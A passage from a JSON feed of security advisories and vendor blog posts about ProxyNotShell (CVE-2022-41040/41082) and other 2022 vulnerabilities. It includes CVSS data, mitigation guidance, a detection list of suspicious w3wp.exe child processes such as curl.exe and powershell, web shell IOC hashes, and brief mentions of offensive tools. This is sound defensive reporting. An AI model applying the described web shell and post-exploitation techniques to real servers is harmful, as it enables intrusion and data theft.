CVE-2022-41040, which should curtail the vulnerability accessibility to attackers, the required level of privilege is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization called GTSC, granting attackers access to some of their clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.\n\nThe chained vulnerabilities could grant an outsider attacker the ability to read emails directly off an organization's server the ability to breach the organization with CVE-2022-41040 Remote Code Execution and implant malware on the organization's Exchange Server with CVE-2022-41082.\n\nThough it appears that attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required \u2013 rated \"Low\" by Microsoft \u2013 is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. This hopefully will prevent a replay of the 2021 ProxyShell debacle.\n\nYet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure of unknown efficacy.\n\nBlocking incoming traffic to Exchange Servers holding critical asserts is also an option, though only practicable if such a measure does not impact vital operations and should ideally be perceived as a temporary measure pending Microsoft's issuance of a verified patch.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to ProxyNotShell might prevent taking potentially disruptive unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enable organizations to estimate exactly their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it on your environment yields the necessary information to validate exposure \u2013 or lack thereof - to ProxyNotShell.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgOoxz7w2_H46l72-JIWEEozP6gnLHfSQt_wbm1RRkjB0NOn2rBaB0wW4-jBFx4wbMgPAmXZvOdPPwjnUFX2u8zbdJZLSXKMAoft6Skt3EXk_gH1ehXK9DLBpHKouidVH9WE9P1SQs3h-s1VAfGKtHqeXaxkjtGS4lDIItWgmQo1FSLk_6z6fV7ZtQw/s728-e100/222.png>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiqGWTwc-0vwEKrwSp1s7coId4IRI3KelQKVBG1iXsx0N32996O0Lprr0PA035V1oLkFpdjQ1euXlqcL0le7gsuWoWI9NSCEBW0Nj-OCQZn8ovDyuK-b-MtVYhjKmGIWuZO5IkdqNRBvKSiWttxGP46GmxjlZtpI_FSz2728WiqkvKTOoOJIp0KrjOH/s728-e100/111.png>)\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell to evaluate exactly which servers are potential targets is the most cost-efficient way to evaluate exactly which assets are exposed and devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-28T04:05:53", "description": "Welcome to the third edition of the Qualys Research Team\u2019s \u201cThreat Research Thursday\u201d, where we collect and curate notable new tools, techniques, procedures, threat intelligence, cybersecurity news, malware attacks, and more. Feedback on our second edition, [Qualys Threat Research Thursday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/29/qualys-threat-research-thursday>), is more than welcome. We would love to hear from you! \n\n\n\n## From the Qualys Blog \n\nHere is a roundup of the most interesting blogs from the Qualys Research Team over the past couple of weeks: \n\n * [Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/30/qualys-response-to-proxynotshell-microsoft-exchange-server-zero-day-threat-using-qualys-platform>) \u2013 How do you detect the ProxyNotShell vulnerability that was released a month ago? This blog talks about all of this and more. Definitely worth a look since no official patches are available as of today! \n * [Leeloo Multipath: Authorization bypass and symlink attack in multipathd (CVE-2022-41974 and CVE-2022-41973)](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/25/leeloo-multipath-authorization-bypass-and-symlink-attack-in-multipathd-cve-2022-41974-and-cve-2022-41973>) \u2013 Fresh from the Qualys Research Team! Read more about our indigenous research in discovering these vulnerabilities affecting the `multipathd` daemon.\n * [Text4Shell: Detect, Prioritize and Remediate The Risk Across On-premise, Cloud, Container Environment Using Qualys Platform](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/27/text4shell-detect-prioritize-and-remediate-the-risk-across-on-premise-cloud-container-environment-using-qualys-platform>) - All the details for detecting, prioritizing and remediating the Text4Shell vulnerability can be found in this post.\n\n## New Tools &amp; Techniques \n\n**ScubaGear** \u2013 This assessment tool was developed by CISA. It verifies that an M365 tenant\u2019s configuration conforms to the policies described in the SCuBA Minimum Viable Secure Configuration Baseline documents. Currently, available baseline documents cater to Hybrid Azure Active Directory (AD), Microsoft 365 Defender, Microsoft Exchange Online, OneDrive for Business, Power BI, the Microsoft Power Platform, SharePoint Online and Microsoft Teams. ScubaGear v0.1.0 source can be [found on GitHub](<https://github.com/cisagov/ScubaGear>). \n\n**RustHound** \u2013 This cross-platform active directory collector for BloodHound is written in Rust. It will work on Linux, Windows, or MacOS. Though not all features from SharpHound are implemented yet, it is worthwhile to get this into our detection engineering cycles so that effective detections can be developed. [Check out the GitHub project](<https://github.com/OPENCYBER-FR/RustHound>). \n\n**WinDbg** \u2013 I know, I know! WinDbg is old. But the latest version of the WinDbg Preview debugger is now available with regex search and restricted mode support. [Check out WinDbg 1.2107.13001.0](<https://apps.microsoft.com/store/detail/windbg-preview/9PGJGD53TN86>). \n\n**Sysmon - **This release fixes and adds a new Windows Event ID 28 for FileBlockShredding, which is generated when Sysmon detects and blocks file shredding from tools such as SDelete. [Download Sysmon v14.1](<https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon>). \n\n**SockFuzzer \u2013 **This is an all-in-one network syscall fuzzer for XNU. It helps you fuzz the network stack on macOS and Linux-based hosts in userland. Check [it out here](<https://github.com/googleprojectzero/SockFuzzer>). \n\n**SharpEfsPotato** - This is a neat demonstration of local privilege escalation from SeImpersonatePrivilege using Encrypting File System Remote (EFSRPC) Protocol. This combines two different projects - SweetPotato and SharpSystemTriggers/SharpEfsTrigger. Read more on [SharpEfsPotato](<https://github.com/bugch3ck/SharpEfsPotato>). \n\n**TokenMan** \u2013 This new and open-source token manipulation tool will help you in post-exploitation activities when working with Azure Active Directory \u2013 especially useful when you have a Family of Client ID (FOCI) access. Download [the tool here](<https://github.com/secureworks/TokenMan>). \n\n## New Vulnerabilities\n\n**CVE-2022-41040, CVE-2022-41082** \u2013 aka ProxyNotShell! Mitigations are available for these 0day vulnerabilities. They apply to Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. Limited, targeted attacks are still being seen in the wild for these server-side request forgery (SSRF) and remote code execution (RCE) vulnerabilities. Read more on the [Microsoft Customer Guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) page. Qualys customers can scan for QID 50122 and find vulnerable and unpatched Microsoft Exchange systems in their environment. \n\n**CVE-2022-41352 **\u2013 This publicly exploited vulnerability affecting Zimbra Collaboration (ZCS) 8.8.15 and 9.0, allows a remote attacker to gain incorrect access to any other user accounts. Qualys VMDR customers can keep a look out for QID 377618 in their reports and identify vulnerable installations. It is recommended that affected customers update to ZCS 9.0.0 Patch 27 or ZCS 8.8.15 Patch 34. More information about this can be [found here](<https://wiki.zimbra.com/wiki/Security_Center>). \n\n**CVE-2022-40684 \u2013 **This Fortinet authentication bypass vulnerability allows threat attackers to log in as an administrator on affected FortiOS, FortiProxy, and FortiSwitchManager products. A simple HTTP packet to the administrative interface is enough to compromise an affected device. Qualys VMDR and WAS QIDS - 150585, 730623, 43921 should get you started with finding vulnerable systems in your environment. Follow it up by patching up the vulnerability as mentioned in this [vendor-published advisory](<https://www.fortiguard.com/psirt/FG-IR-22-377>). Reminder \u2013 a PoC exploiting this vulnerability is already out in the wild. \n\n## Noteworthy Mentions \n\nQualys Threat Research Team contributed to the October 25, 2022 release of **MITRE ATT&amp;CK v12**! Our contribution from [Defending Against Scheduled Task Attacks in Windows Environments](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments>) was cited under [T1053.005](<https://attack.mitre.org/techniques/T1053/005/>). This release introduces \u201cCampaigns\u201d, where adversary activity conducted over a specific period on common targets are grouped together. This version of ATT&amp;CK for Enterprise contains 14 Tactics, 193 Techniques, 401 Sub-techniques, 135 Groups, 14 Campaigns, and 718 Pieces of Software. [Read more here](<https://attack.mitre.org/resources/updates/updates-october-2022/>). \n\nWe also contributed to the awesome and open-source **Atomic Red Team** framework. Examples are [Atomic Test #22 - Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key](<https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md#atomic-test-22---disable-uac-admin-consent-prompt-via-consentpromptbehavioradmin-registry-key>) and [Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message](<https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md#atomic-test-2---configure-legalnoticecaption-and-legalnoticetext-registry-keys-to-display-ransom-message>) by our Senior Engineer, Threat Research - [Harshal](<https://blog.qualys.com/author/htupsamudre>). \n\n## Threat Thursdays Webinar \n\nIf you missed last month&#x27;s [Threat Thursday](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>) monthly webinar where the Qualys Threat Research Team presented an in-depth analysis of AsyncRAT, you could watch on-demand at the link below. \n\n[Watch Now](<https://gateway.on24.com/wcc/eh/3347108/lp/3987473/qualys_research_team_threat_thursdays_october_2022/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-28T00:58:53", "type": "qualysblog", "title": "Qualys Research Team: Threat Thursdays, October 2022", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-40684", "CVE-2022-41040", "CVE-2022-41082", "CVE-2022-41352", "CVE-2022-41973", "CVE-2022-41974"], "modified": "2022-10-28T00:58:53", "id": "QUALYSBLOG:69FF0F583C65CD2D1EB59914BE41A705", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T12:05:09", "description": "On September 29, 2022, active attacks against Microsoft Exchange were reported by Vietnamese cybersecurity company GTSC. The researcher at GTSC reported two critical vulnerabilities (now named \u201cProxyNotShell\u201d) in Microsoft Exchange Server via two advisories issued by [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/upcoming/>): [ZDI-CAN-18333](<https://www.zerodayinitiative.com/advisories/upcoming/#:~:text=by%3A%20Marcin%20Wiazowski-,ZDI%2DCAN%2D18333,-Microsoft>) and [ZDI-CAN-18802](<https://www.zerodayinitiative.com/advisories/upcoming/#:~:text=Zero%20Day%20Initiative-,ZDI%2DCAN%2D18802,-Microsoft>).\n\nThe first flaw (CVE-2022-41040) is a Server-Side Request Forgery (SSRF) vulnerability. The second flaw (CVE-2022-41082) allows remote code execution (RCE) when PowerShell is accessible to the attacker. Microsoft mentions that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either of the two vulnerabilities. \n\nOn September 30, 2022, Microsoft released an [advisory](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) acknowledging that they are _\u201caware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d_\n\nThreat actors are chaining these two zero-day vulnerabilities to deploy Chinese Chopper web shells on vulnerable Microsoft Exchange Servers for persistence and data theft. Based on the code on these web shells, GTSC suspects that these threat actors are based in China. As a result, CISA has added these vulnerabilities to its list of [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThese vulnerabilities affect the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\n## Qualys Vulnerability Coverage (QID)\n\nQualys customers can use the following QID to identify potentially vulnerable assets in their environments.\n\n**QID**| **Title**| Release Versions \n---|---|--- \n50122| Microsoft Exchange Server Multiple Vulnerabilities (Zero Day)| VULNSIGS-2.5.596-5 or later and QAGENT-SIGNATURE-SET-2.5.596.5-4 or later \n \n## Detect ProxyNotShell Using Qualys VMDR\n\nHere are the steps that your organization can take to rapidly respond to the zero-day threat of ProxyNotShell using Qualys VMDR.\n\n### Identify Microsoft Exchange Server Assets****\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of your potentially vulnerable assets. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange Server systems.\n\nUse the following Qualys Query Language (QQL) string:\n\n_operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\nQualys CSAM displays inventory of all Microsoft Exchange Server assets\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, for example: \u201cProxyNotShell Exchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the zero-days as well as any new Windows Exchange Server that is provisioned in your environment. Tagging makes these grouped assets available for querying, reporting, and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\nUsing the VMDR Dashboard, you can track \u2018Exchange 0-day\u2019, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Read the Article (Qualys Customer Portal)**: [ProxyNotShell Exchange Server 0-Day Dashboard | Critical Global View](<https://success.qualys.com/support/s/article/000006994>)\n\n Exchange Server 0-Day Dashboard in Qualys VMDR\n\n### Discover ProxyNotShell Exchange Server Zero-Day Vulnerabilities****\n\nNow that hosts running Microsoft Exchange Server are identified, you will want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like these based on the always up-to-date Qualys KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_VMDR query: vulnerabilities.vulnerability.qid: 50122_\n\nQualys VMDR isolates all Exchange Server assets with the vulnerability QID 50122\n\nQID 50122 is available in signature version VULNSIGS-2.5.596-5 and above. It can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.596.5-4 and above.\n\n## Microsoft Guidance for Risk Mitigation of ProxyNotShell****\n\nMicrosoft has released [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server [msrc-blog.microsoft.com]](<https://urldefense.com/v3/__https:/msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/__;!!Pw1rFClp!uMi4DoMkOqqFrUWPAWLwADPST1cL7Me88BZ3s_42Deankj3Bhue8qpgtSpj5hBv8jRjKOAsQe0cLPztgFzi-Eeyr$>). According to the blog post, \u201cMicrosoft is aware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d The two vulnerabilities are CVE-2022-41040 and CVE-2022-41082, affecting on-premises Microsoft Exchange Server 2013, 2016, and 2019.\n\nNote: Microsoft Exchange Online is not affected. \n\nAn attacker could exploit these vulnerabilities to take control of an affected system.\n\n### Remediation/Mitigation of ProxyNotShell\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) and [Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) (CAR) customers can leverage the scripting capabilities of both products to deploy mitigation actions to their Exchange Servers.\n\nBy leveraging Qualys CAR\u2019s scripting capabilities or Patch Management&#x27;s pre-actions capabilities, customers can deploy a PowerShell script to apply the mitigations recommended by Microsoft.\n\nRefer to the Qualys scripting library on GitHub for [the mitigation script](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Zero%20Day/CVE-2022-41040%2C41082\\(ProxyNotShell%20Microsoft%20Exchange%20Server\\)>) and execute it via Qualys CAR on required assets.\n\nAs per the mitigation introduced by MS, Qualys Policy Compliance customers can evaluate mitigation on MS Exchange targets with control:\n\n**24782 Status of the &#x27;URL Rewrite Instructions&#x27; configured for the site and applications**\n\n\n\n**24802 Status of the &#x27;Remote PowerShell access&#x27; setting enabled for users**\n\n\n\n## Detect Malicious Behavior related to ProxyNotShell using Qualys Multi-Vector EDR\n\nBased on the post-exploitation activity from multiple threat actors, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) customers can hunt for the following malicious activities: \n\n 1. Detecting usual children of w3wp.exe such as: \n * csc.exe \n * transcodingservice.exe \n * werfault.exe \n * powershell \n * powershell_ise \n * python \n * curl.exe \n 2. Detecting webshell-like files with the following extensions being written on an Exchange Server: \n * .ashx \n * .aspx \n * .asmx \n * .asax \n\n## Detect Exploitation Attempts related to ProxyNotShell using Qualys Context XDR \n\nInterested [Qualys Context XDR](<https://www.qualys.com/apps/extended-detection-response/>) customers can contact their Technical Account Managers for the following rules: \n\n 1. T1190 - [Akamai WAF] ProxyNotShell RCE Vulnerability Exploitation Detected (CVE-2022-41040/CVE-2022-41082) \n 2. T1190 - ProxyNotShell RCE Vulnerability Exploitation Detected (CVE-2022-41040/CVE-2022-41082) \n 3. T1190 - [Trend Micro TippingPoint IPS] ProxyNotShell RCE Vulnerability Exploitation Detected \n 4. T1190 - ProxyNotShell RCE Vulnerability Exploitation Detected via Firewall (CVE-2022-41040/CVE-2022-41082) \n\nWith Qualys Context XDR, customers have the power to write their own detections as well. An example of a generic rule that detects ProxyNotShell attempts is shown below: \n\n\n\n## Indicators of Compromise (IOCs) for ProxyNotShell\n\n**Filenames**| **SHA256 Hash**| **Path** \n---|---|--- \nPxh4HG1v.ashx| c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nRedirSuiteServiceProxy.aspx| 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nRedirSuiteServiceProxy.aspx| b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nxml.ashx| c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1| \nerrorEE.aspx| be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nDll.dll| 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82| \nDll.dll| 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9| \nDll.dll| 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0| \nDll.dll| 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3| \nDll.dll| C8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2| \n180000000.dll| 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e| \n \n## Contributors\n\n * [Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), Director, Vulnerability and Threat Research, Qualys\n * [Mehul Revankar](<https://blog.qualys.com/author/mRevankar>), VP, Product Management &amp; Engineering for VMDR, Qualys\n * [Mayuresh Dani](<https://blog.qualys.com/author/mayuresh>), Manager, Threat Research, Qualys\n * [Lavish Jhamb](<https://blog.qualys.com/author/ljhamb>), Solution Architect, Compliance Solutions, Qualys\n * [Eran Livne](<https://blog.qualys.com/author/elivne>), Senior Director, Endpoint Remediation, Qualys\n * Mukesh Choudhary, Compliance Research Analyst, Qualys\n * Mohd Anas Khan, Compliance Research Analyst, Qualys\n * Arun Pratap Singh, Engineer, Threat Research, Qualys\n * David Lu, Senior Engineer, Threat Research, Qualys\n * Felix Jimenez Saez, Director, Product Management. Qualys", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T23:25:55", "type": "qualysblog", "title": "Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T23:25:55", "id": "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2022-10-13T16:50:00", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Microsoft addresses two new zero-day vulnerabilities tracked under CVE-2022-41033, an Elevation of Privilege vulnerability exploited in the wild. CVE-2022-41043 is an Information Disclosure vulnerability was publicly disclosed. Microsoft has not released security updates for two actively exploited zero-day vulnerabilities dubbed to ProxyNotShell.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-13T12:15:39", "type": "hivepro", "title": "Did Patch Tuesday address the zero-day flaw in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41033", "CVE-2022-41043"], "modified": "2022-10-13T12:15:39", "id": "HIVEPRO:F327ABE1BEFB40043AD5F33DA5692070", "href": "https://www.hivepro.com/did-patch-tuesday-address-the-zero-day-flaw-in-microsoft-exchange/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-03T06:08:35", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Microsoft Exchange Server has two unpatched zero-day vulnerabilities. One of them is a Server-Side Request Forgery (SSRF) vulnerability(CVE-2022-41040), while the second is a remote code execution (RCE) vulnerability (CVE-2022-41082)in PowerShell. An authenticated attacker can exploit these vulnerabilities together to gain access to a victim&#x27;s system by chaining them together.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T10:21:56", "type": "hivepro", "title": "Unpatched zero-day vulnerabilities of Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T10:21:56", "id": "HIVEPRO:B4C85BEFF3E49468BE44E35CEC3A7DE6", "href": "https://www.hivepro.com/unpatched-zero-day-vulnerabilities-of-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T10:11:40", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary The active exploitation of an unpatched CVE-2022-41352 remote code execution (RCE) vulnerability found in the Zimbra Collaboration Suite (ZCS). It empowers attackers to upload arbitrary files and execute malicious operations on vulnerable hosts. The bug exists as a result of amavis insecure fallback to utilizing cpio to extract files if the pax package is not installed on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T07:28:31", "type": "hivepro", "title": "Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41352"], "modified": "2022-10-11T07:28:31", "id": "HIVEPRO:33F7ACF184167B2BC236A12082041131", "href": "https://www.hivepro.com/zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-01T06:40:26", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary CVE-2022-34689 is a critical vulnerability in Windows CryptoAPI that was publicly announced by Microsoft in October 2022. The vulnerability allows an attacker to masquerade as a legitimate entity by exploiting the assumption that the certificate cache index key, based on MD5, is collision-free.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-02-01T05:51:58", "type": "hivepro", "title": "Proof-of-concept released for Windows CryptoAPI vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2023-02-01T05:51:58", "id": "HIVEPRO:E2550D26AC21BB6F731E41DD4D48AFA8", "href": "https://www.hivepro.com/proof-of-concept-released-for-windows-cryptoapi-vulnerability/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-28T12:53:24", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Tailgate campaign is currently being carried out by the threat actors Hafnium and OilRig. The goal of this campaign is to exploit vulnerabilities in Fortinet. Recently discovered vulnerability CVE-2022-40684, which has been attributed to Fortinet Products, is among the exploited vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 